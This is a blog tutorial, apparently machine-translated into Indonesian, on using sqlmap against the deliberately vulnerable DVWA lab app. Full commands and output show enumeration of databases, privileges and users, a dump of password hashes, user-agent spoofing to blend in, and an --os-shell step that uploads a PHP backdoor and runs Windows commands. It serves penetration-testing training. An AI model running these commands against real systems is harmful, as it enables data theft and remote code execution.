Belajar sambil berlatih: Melanjutkan SQL Injection dengan SQLMap

  • Whatsapp
Belajar sambil berlatih: Melanjutkan SQL Injection dengan SQLMap
Belajar sambil berlatih Melanjutkan SQL Injection dengan SQLMap

[*]News.nextcloud.asia

Beberapa waktu yang lalu, saya membuat posting ini tentang melakukan injeksi SQL secara manual. Dalam posting ini, kami memanfaatkan salah satu alat paling umum yang digunakan untuk injeksi SQL. Dalam dua posting berikutnya, kami akan melakukan, log dan analisis paket untuk mendeteksi aktivitas yang dilakukan oleh SQLMap.

Untuk memanfaatkan aplikasi web, penyerang setidaknya harus memahami operasi dasar aplikasi. Untuk postingan kali ini, kita akan menggunakan Dam Vulnerable Web Application (DVWA) dan injeksi SQLi-nya.

Saat pertama kali mengakses aplikasi, kita akan diberikan layar login. Kredensial default adalah nama pengguna “admin” dan kata sandi “kata sandi”. Dalam contoh ini, URL kita adalah “http://10.0.0.108/dvwa/login.php”

Setelah kami masuk dan menavigasi ke halaman SQLi dan memasukkan nilai “1”, kami mendapatkan:

Sekarang kita tahu bahwa memasukkan “1” mengembalikan beberapa hasil, apa yang akan terjadi jika kita memasukkan satu centang seperti ‘ ? Server mengembalikan kesalahan berikut:

You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''''' at line 1

Dari atas, kita dapat menyimpulkan bahwa situs ini mungkin rentan terhadap serangan injeksi SQL. Mari kita jalankan pengujian menggunakan SQLMap.

Jika kita melihat URL, dari permintaan yang sah, kita melihat:

http://10.0.0.108/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#

Dari atas, kita melihat dua parameter. Ini adalah “id” dan “kirim”. Sekarang mari kita gunakan ini dengan SQLMap.

Ketika kita menjalankan SQLMap, kita mendapatkan:

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#"
        ___
       __H__
 ___ ___[']_____ ___ ___  {1.4.6#stable}
|_ -| . [']     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 10:58:49 /2020-06-24/

[10:58:50] [INFO] testing connection to the target URL
got a 302 redirect to 'http://10.0.0.108:80/dvwa/login.php'. Do you want to follow? [Y/n]n

Di atas kita melihat kita sedang diarahkan kembali ke halaman login ‘http://10.0.0.108:80/dvwa/login.php’. Mungkin akan agak sulit bagi kami untuk mengautentikasi dari baris perintah dan kembali ke halaman itu. Untungnya bagi kita, kita dapat menggunakan argumen “–cookie”.

Mengingat kami masuk ke aplikasi sebelumnya, pada dasarnya kami dapat menggunakan kembali cookie itu. Atau, jika Anda memiliki cookie pengguna lain, Anda mungkin dapat mengautentikasi dengan cookie itu juga. Mari kita gunakan cookie.

Untuk menemukan cookie yang akan digunakan, saya “mengklik kanan” pada halaman yang dimaksud (ingat saya telah masuk sebelumnya), memilih “Periksa” dan kemudian memilih tab “Konsol”. Setelah di konsol, saya menjalankan “document.cookie”. Ini mengembalikan cookie “security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0”

Sekarang kita memiliki cookie, mari kita gunakan dengan SQLMap. Mari kita juga menggunakan kesempatan untuk menyiram informasi sesi sebelumnya untuk target saat ini, dengan menggunakan “–flush-session”.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.4.6#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V...       |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 11:18:19 /2020-06-24/

[11:18:20] [INFO] testing connection to the target URL
[11:18:21] [INFO] checking if the target is protected by some kind of WAF/IPS
[11:18:21] [INFO] testing if the target URL content is stable
[11:18:21] [INFO] target URL content is stable
[11:18:21] [INFO] testing if POST parameter 'id' is dynamic
[11:18:22] [WARNING] POST parameter 'id' does not appear to be dynamic
[11:18:22] [INFO] heuristic (basic) test shows that POST parameter 'id' might be injectable (possible DBMS: 'MySQL')
[11:18:22] [INFO] heuristic (XSS) test shows that POST parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[11:18:22] [INFO] testing for SQL injection on POST parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n]
.... <truncated for brevity> .....
11:20:35] [WARNING] in OR boolean-based injection cases, please consider usage of switch '--drop-set-cookie' if you experience any problems during data retrieval
POST parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] 
sqlmap identified the following injection point(s) with a total of 144 HTTP(s) requests:
.... <truncated for brevity> .....

Sepertinya kami sekarang dapat mengonfirmasi bahwa ada kerentanan, yang mungkin dapat kami manfaatkan. Kita bisa melihat ini di atas dari 3 baris yang dicetak tebal.

Sekarang kita tahu ini bekerja, mari kita menghitung “banner” melalui argumen “–banner”. Kami juga akan menggunakan opsi “–batch” karena saat ini tidak diperlukan input pengguna. Selain itu, seperti yang dilaporkan di atas “sepertinya DBMS back-end adalah ‘MySQL'”. Mari tentukan ini melalui “–dbms=”MySQL”

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --banner
.... <truncated for brevity> .....

---
[12:12:56] [INFO] the back-end DBMS is MySQL
[12:12:56] [INFO] fetching banner
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.1.30-MariaDB'
[12:12:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:12:57 /2020-06-24/

Dari atas, kita melihat database backend adalah “MySQL >= 5.0 (MariaDB fork)”. Secara khusus kami melihat spanduk “banner: ‘10.1.30-MariaDB'”.

Pada titik ini kita dapat berburu internet untuk menemukan kerentanan yang terkait dengan “10.1.30-MariaDB'”

Mari kita lanjutkan perjalanan ini. Namun, sebelum kita menghitung pengguna saat ini (“–pengguna saat ini”), mari kita coba untuk berbaur. Secara default, versi SQLMap yang saya gunakan menggunakan agen pengguna “sqlmap/1.4.6#stable (http://sqlmap.org)Mari kita buat ini terlihat seperti browser biasa dengan memanfaatkan argumen “–user-agent”. Mari kita pinjam agen-pengguna dari WhatIsMyBrowser.com. Secara khusus, mari kita ambil Presto “Opera/9.80 (Windows NT 6.1; WOW64) /2.12.388 Versi/12.18” agen pengguna.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --user-agent="Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.18" --current-user

.... <truncated for brevity> .....

---
[12:28:55] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:28:56] [INFO] fetching current user
current user: '[email protected]'
[12:28:56] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:28:56 /2020-06-24/

Di atas, kita melihat “pengguna saat ini: ‘[email protected]'”. Tidak ada gunanya menjalankan program sebagai “root”. Mungkin ini akan bermanfaat bagi kita nanti.

Ok, di atas sudah keren kita bisa menentukan user-agent. Bagaimana kalau daripada menentukan satu, kami membiarkan SQLMap melakukan ini sendiri. Saat kita melihat untuk menghitung database saat ini (“–current-db”), mari kita juga menggunakan “–random-agent”.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --current-db
....

[12:34:38] [INFO] fetched random HTTP User-Agent header value 'Mozilla/5.0 (X11; U; Linux i686; pl; rv:1.8) Gecko/20051111 Firefox/1.5 Ubuntu' from file '/usr/share/sqlmap/data/txt/user-agents.txt'

.... <truncated for brevity> .....

---
[12:35:05] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:35:05] [INFO] fetching current database
current database: 'dvwa'
[12:35:05] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:35:05 /2020-06-24/

Kita melihat di atas bahwa agen pengguna dipilih dari file “user-agents.txt” bersama dengan “database saat ini: ‘dvwa'”. Mari kita lihat database lain apa yang mungkin ada atau yang mungkin kita akses menggunakan “–dbs”

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --dbs

.... <truncated for brevity> .....

---
[12:41:28] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:41:29] [INFO] fetching database names
available databases [7]:
[*] dvwa
[*] information_schema
[*] mysql
[*] nowasp
[*] performance_schema
[*] phpmyadmin
[*] test

Di atas kita melihat daftar database yang tersedia. Sepertinya kita bisa bersenang-senang dengan beberapa ini. Namun, mari kita tetap menggunakan “dvwa” saat ini. Kita sudah tahu bahwa pengguna saat ini adalah “[email protected]”. Mari kita lihat apakah pengguna ini juga merupakan administrator basis data melalui “–is-dba”

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --is-dba

.... <truncated for brevity> .....
---
[12:45:12] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:45:12] [INFO] testing if current user is DBA
[12:45:12] [INFO] fetching current user
current user is DBA: True
[12:45:13] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:45:13 /2020-06-24/

Sepertinya pengguna saat ini adalah Administrator Basis Data. Mari validasikan hak istimewa dari berbagai pengguna melalui “–hak istimewa”.

Looks like the current user is a Database Administrator. Let's validate the privileges of the various users via "--privileges". 

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --privileges
.... <truncated for brevity> .....
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:49:51] [INFO] fetching database users privileges
database management system users privileges:
[*] ''@'localhost' [1]:
    privilege: USAGE
[*] 'pma'@'localhost' [1]:
    privilege: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    privilege: ALTER
    privilege: ALTER ROUTINE
    privilege: CREATE
    privilege: CREATE ROUTINE
    privilege: CREATE TABLESPACE
    privilege: CREATE TEMPORARY TABLES
    privilege: CREATE USER
    privilege: CREATE VIEW
    privilege: DELETE
    privilege: DROP
    privilege: EVENT
    privilege: EXECUTE
    privilege: FILE
    privilege: INDEX
    privilege: INSERT
    privilege: LOCK TABLES
    privilege: PROCESS
    privilege: REFERENCES
    privilege: RELOAD
    privilege: REPLICATION CLIENT
    privilege: REPLICATION SLAVE
    privilege: SELECT
    privilege: SHOW DATABASES
    privilege: SHOW VIEW
    privilege: SHUTDOWN
    privilege: SUPER
    privilege: TRIGGER
    privilege: UPDATE

[12:49:51] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:49:51 /2020-06-24/


Liking the program which has been made so far, let's now look at the roles of the various users via "--roles"

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent --roles

<.... truncated for brevity ..... >
[12:51:48] [INFO] fetched random HTTP User-Agent header value 'Opera/9.01 (X11; Linux i686; U; en)' from file '/usr/share/sqlmap/data/txt/user-agents.txt


12:52:16] [INFO] fetching database users privileges
database management system users roles:
[*] ''@'localhost' [1]:
    role: USAGE
[*] 'pma'@'localhost' [1]:
    role: USAGE
[*] 'root'@'127.0.0.1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'::1' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE
[*] 'root'@'localhost' (administrator) [28]:
    role: ALTER
    role: ALTER ROUTINE
    role: CREATE
    role: CREATE ROUTINE
    role: CREATE TABLESPACE
    role: CREATE TEMPORARY TABLES
    role: CREATE USER
    role: CREATE VIEW
    role: DELETE
    role: DROP
    role: EVENT
    role: EXECUTE
    role: FILE
    role: INDEX
    role: INSERT
    role: LOCK TABLES
    role: PROCESS
    role: REFERENCES
    role: RELOAD
    role: REPLICATION CLIENT
    role: REPLICATION SLAVE
    role: SELECT
    role: SHOW DATABASES
    role: SHOW VIEW
    role: SHUTDOWN
    role: SUPER
    role: TRIGGER
    role: UPDATE

[12:52:16] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:52:16 /2020-06-24/

Dengan hal di atas, kami dapat menyimpulkan siapa pengguna sistem ini berdasarkan kueri yang kami buat untuk hak istimewa. Namun, mari konfirmasi pengguna melalui “–users”.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent --users
<... truncated for brevity ...>
---
[12:59:59] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:59:59] [INFO] fetching database users
database management system users [5]:
[*] ''@'localhost'
[*] 'pma'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

[12:59:59] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 12:59:59 /2020-06-24/

Sekarang mari kita lihat mengambil kata sandi melalui “–password”. Mari kita juga menghapus opsi “–batch”. Ini memungkinkan kita untuk sekarang berinteraksi dengan SQLMap.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --random-agent --passwords

<... truncated for brevity ...>


[13:04:08] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:04:09] [INFO] fetching database users password hashes
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] 
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] 
[13:04:27] [WARNING] no clear password(s) found
database management system users password hashes:
[*] pma [1]:
    password hash: NULL
[*] root [1]:
    password hash: NULL

[13:04:27] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:04:27 /2020-06-24/

Sekarang mari kita lihat tabel di dalam berbagai database.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --batch --tables

---
[13:17:56] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:17:56] [INFO] fetching database names
[13:17:56] [INFO] fetching tables for databases: 'dvwa, information_schema, mysql, nowasp, performance_schema, phpmyadmin, test'                                                                                                                        
Database: dvwa
[2 tables]
+----------------------------------------------------+
| guestbook                                          |
| users                                              |
+----------------------------------------------------+

Database: information_schema
[78 tables]
+----------------------------------------------------+
| ALL_PLUGINS                                        |
| APPLICABLE_ROLES                                   |
<.... truncated for brevity .... >
| STATISTICS                                         |
| TABLES                                             |
+----------------------------------------------------+

Database: mysql
[34 tables]
+----------------------------------------------------+
| db                                                 |
| event                                              |
| user                                               |
<.... truncated for brevity .... >
| time_zone_transition                               |
| time_zone_transition_type                          |
+----------------------------------------------------+

Database: nowasp
[13 tables]
+----------------------------------------------------+
| accounts                                           |
| balloon_tips                                       |
| blogs_table                                        |
<.... truncated for brevity .... >
| user_poll_results                                  |
| youtubevideos                                      |
+----------------------------------------------------+

Database: performance_schema
[52 tables]
+----------------------------------------------------+
| accounts                                           |
| cond_instances                                     |
| events_stages_current                              |
<.... truncated for brevity .... >
| users                                              |
+----------------------------------------------------+

Database: phpmyadmin
[19 tables]
+----------------------------------------------------+
| pma__bookmark                                      |
| pma__central_columns                               |
<.... truncated for brevity .... >
| pma__users                                         |
+----------------------------------------------------+

[13:17:57] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:17:57 /2020-06-24/

Sementara informasi di atas terpotong, Anda dapat melihat bahwa pada dasarnya kami telah membuang semua tabel dari berbagai database. Kita sekarang dapat fokus pada struktur tabel tertentu dengan mengeksekusi “-D” untuk database tertentu dan “-T” untuk tabel tertentu dan “–kolom”

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa -T users --columns

---
[13:29:19] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:29:19] [INFO] fetching columns for table 'users' in database 'dvwa'
Database: dvwa
Table: users
[8 columns]
+--------------+-------------+
| Column       | Type        |
+--------------+-------------+
| password     | varchar(32) |
| user         | varchar(15) |
| avatar       | varchar(70) |
| failed_login | int(3)      |
| first_name   | varchar(15) |
| last_login   | timestamp   |
| last_name    | varchar(15) |
| user_id      | int(6)      |
+--------------+-------------+

[13:29:19] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:29:19 /2020-06-24/

Sekarang mari kita membaca semua record dalam tabel “users” di dalam database “dvwa” melalui “–sql-query”.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --batch --dbms="MySQL" --random-agent -D dvwa --sql-query="select * from users"

<.... truncated for brevity ....>

---
[13:33:52] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:33:52] [INFO] fetching SQL SELECT statement query output: 'select * from users'
[13:33:52] [INFO] you did not provide the fields in your query. sqlmap will retrieve the column names itself
[13:33:52] [WARNING] missing database parameter. sqlmap is going to use the current database to enumerate table(s) columns
[13:33:52] [INFO] fetching current database
[13:33:52] [INFO] fetching columns for table 'users' in database 'dvwa'
[13:33:52] [INFO] the query with expanded column name(s) is: SELECT `password`, `user`, avatar, failed_login, first_name, last_login, last_name, user_id FROM users
select * from users [5]:
[*] 5f4dcc3b5aa765d61d8327deb882cf99, admin, http://localhost/DVWA/hackable/users/admin.jpg, 0, admin, 2018-02-05 01:58:15, admin, 1
[*] e99a18c428cb38d5f260853678922e03, gordonb, http://localhost/DVWA/hackable/users/gordonb.jpg, 0, Gordon, 2018-02-05 01:58:15, Brown, 2
[*] 8d3533d75ae2c3966d7e0d4fcc69216b, 1337, http://localhost/DVWA/hackable/users/1337.jpg, 0, Hack, 2018-02-05 01:58:15, Me, 3
[*] 0d107d09f5bbe40cade3de5c71e9e9b7, pablo, http://localhost/DVWA/hackable/users/pablo.jpg, 0, Pablo, 2018-02-05 01:58:15, Picasso, 4
[*] 5f4dcc3b5aa765d61d8327deb882cf99, smithy, http://localhost/DVWA/hackable/users/smithy.jpg, 0, Bob, 2018-02-05 01:58:15, Smith, 5

[13:33:52] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/10.0.0.108'

[*] ending @ 13:33:52 /2020-06-24/
Dengan informasi yang dikembalikan di atas, kita dapat memecahkan kata sandi menggunakan alat lain atau cukup salin dan tempel ke crackstation.net.

Pada titik ini, ada banyak hal lain yang harus kita lakukan, seperti membaca dan menulis file, dll. Namun, mari kita coba untuk mendapatkan akses ke sistem operasi yang mendasarinya melalui perintah “–os-shell”.

[email protected]:~$ sqlmap --url="http://10.0.0.108/dvwa/vulnerabilities/sqli/" --data="id=1&Submit=Submit#" --cookie="security=low; PHPSESSID=9s5gt19vcn4b6e33t85dajjvf0" --flush-session --dbms="MySQL" --random-agent -D dvwa --os-shell

<.... Truncated for brevity ....>
---
[13:42:17] [INFO] the back-end DBMS is MySQL
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[13:42:17] [INFO] going to use a web backdoor for command prompt
[13:42:17] [INFO] fingerprinting the back-end DBMS operating system
[13:42:18] [INFO] the back-end DBMS operating system is Windows
which web application language does the web server support?
[1] ASP (default)
[2] ASPX
[3] JSP
[4] PHP

Dari atas, kami memilih “[4] PHP”

do you want sqlmap to further try to provoke the full path disclosure? [Y/n] 
you provided a HTTP Cookie header value, while target URL provides its own cookies within HTTP Set-Cookie header which intersect with yours. Do you want to merge them in further requests? [Y/n] 
[13:43:20] [WARNING] unable to automatically retrieve the web server document root
what do you want to use for writable directory?
[1] common location(s) ('C:/xampp/htdocs/, C:/wamp/www/, C:/Inetpub/wwwroot/') (default)
[2] custom location(s)
[3] custom directory list file
[4] brute force search
> 4
Selanjutnya saya memilih pencarian brute force untuk mengunggah file untuk memberi kami shell. Seperti dapat dilihat di bawah, berbagai lokasi sedang dicoba dan file akhirnya diunggah.

use any additional custom directories [Enter for None]: 
[13:49:55] [WARNING] unable to automatically parse any web server path
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via LIMIT 'LINES TERMINATED BY' method
[13:49:55] [WARNING] unable to upload the file stager on '/xampp/'
[13:49:55] [INFO] trying to upload the file stager on '/xampp/' via UNION method
[13:49:55] [WARNING] expect junk characters inside the file as a leftover from UNION query
[13:49:55] [INFO] the remote file '/xampp/tmpufnkt.php' is larger (701 B) than the local file '/tmp/sqlmaptm_zmipy4631/tmpdhp84kj_' (700B)                                                                                                  ...
[15:52:35] [INFO] trying to upload the file stager on '/xampp/htdocs/' via LIMIT 'LINES TERMINATED BY' method
[15:52:35] [INFO] the file stager has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpuevkq.php
[15:52:36] [INFO] the backdoor has been successfully uploaded on '/xampp/htdocs/' - http://10.0.0.108:80/tmpbfkst.php
[15:52:36] [INFO] calling OS shell. To quit type 'x' or 'q' and press ENTER

os-shell> 

…. di atas kita melihat “os-shell>” dan “file stager telah berhasil diupload di ‘/xampp/htdocs/’ – http://10.0.0.108:80/tmpuevkq.php”.

Menguji shell yang kita lihat:

BREAK          Sets or clears extended CTRL+C checking.
BCDEDIT        Sets properties in boot database to control boot loading.
CACLS          Displays or modifies access control lists (ACLs) of files.
CALL           Calls one batch program from another.
CD             Displays the name of or changes the current directory.
CHCP           Displays or sets the active code page number.
CHDIR          Displays the name of or changes the current directory.
CHKDSK         Checks a disk and displays a status report.
CHKNTFS        Displays or modifies the checking of disk at boot time.
CLS            Clears the screen.
CMD            Starts a new instance of the Windows command interpreter.
< ... truncated for brevity .... >
VOL            Displays a disk volume label and serial number.
XCOPY          Copies files and directory trees.
WMIC           Displays WMI information inside interactive command shell.

For more information on tools see the command-line reference in the online help.
---
os-shell> 

Melihat proses pada sistem melalui “wmic process list brief”

os-shell> wmic process list brief
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
HandleCount  Name                       Priority  ProcessId  ThreadCount  WorkingSetSize  
0            System Idle Process        0         0          2            8192            
1974         System                     8         4          99           139264          
52           smss.exe                   11        312        2            987136          
<.... Truncated for brevity .... >   
276          taskhostw.exe              8         1732       4            17592320        
193          svchost.exe                8         5576       4            7356416         
62           cmd.exe                    8         4332       2            3862528         
108          conhost.exe                8         4996       3            10129408        
192          WMIC.exe                   8         5076       6            11042816        
157          WmiPrvSE.exe               8         6520       9            8593408 
....

Lihatlah pengguna pada sistem.

---
os-shell> wmic useraccount
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---
AccountType  Caption                             Description                                                                                      Disabled  Domain           FullName  InstallDate  LocalAccount  Lockout  Name                PasswordChangeable  PasswordExpires  PasswordRequired  SID                                           SIDType  Status    
512          SECURITYNIK-WINAdministrator       Built-in account for administering the computer/domain                                           FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Administrator       TRUE                FALSE            TRUE              S-1-5-21-3846991316-327138358-508696823-500   1        OK        
512          SECURITYNIK-WINDefaultAccount      A user account managed by the system.                                                            TRUE      SECURITYNIK-WIN                         TRUE          FALSE    DefaultAccount      TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-503   1        Degraded  
512          SECURITYNIK-WINGuest               Built-in account for guest access to the computer/domain                                         TRUE      SECURITYNIK-WIN                         TRUE          FALSE    Guest               FALSE               FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-501   1        Degraded  
512          SECURITYNIK-WINSecurityNik                                                                                                          FALSE     SECURITYNIK-WIN                         TRUE          FALSE    SecurityNik         TRUE                FALSE            FALSE             S-1-5-21-3846991316-327138358-508696823-1002  1        OK        
512          SECURITYNIK-WINToronto                                                                                                              FALSE     SECURITYNIK-WIN                         TRUE          FALSE    Toronto             TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-1005  1        OK        
512          SECURITYNIK-WINWDAGUtilityAccount  A user account managed and used by the system for Windows Defender Application Guard scenarios.  TRUE      SECURITYNIK-WIN                         TRUE          FALSE    WDAGUtilityAccount  TRUE                TRUE             TRUE              S-1-5-21-3846991316-327138358-508696823-504   1        Degraded  

---

Ambil “info sistem”

os-shell> systeminfo
do you want to retrieve the command standard output? [Y/n/a] y
command standard output:
---

Host Name:                 SECURITYNIK-WIN
OS Name:                   Microsoft Windows 10 Pro
OS Version:                10.0.16299 N/A Build 16299
OS Manufacturer:           Microsoft Corporation
OS Configuration:          Standalone Workstation
...
Page File Location(s):     C:pagefile.sys
Domain:                    WORKGROUP
Logon Server:              SECURITYNIK-WIN
Hotfix(s):                 2 Hotfix(s) Installed.
                           [01]: KB4053577
                           [02]: KB4054517
Network Card(s):           2 NIC(s) Installed.
                           [01]: Microsoft KM-TEST Loopback Adapter
                                 Connection Name: Npcap Loopback Adapter
                                 DHCP Enabled:    Yes
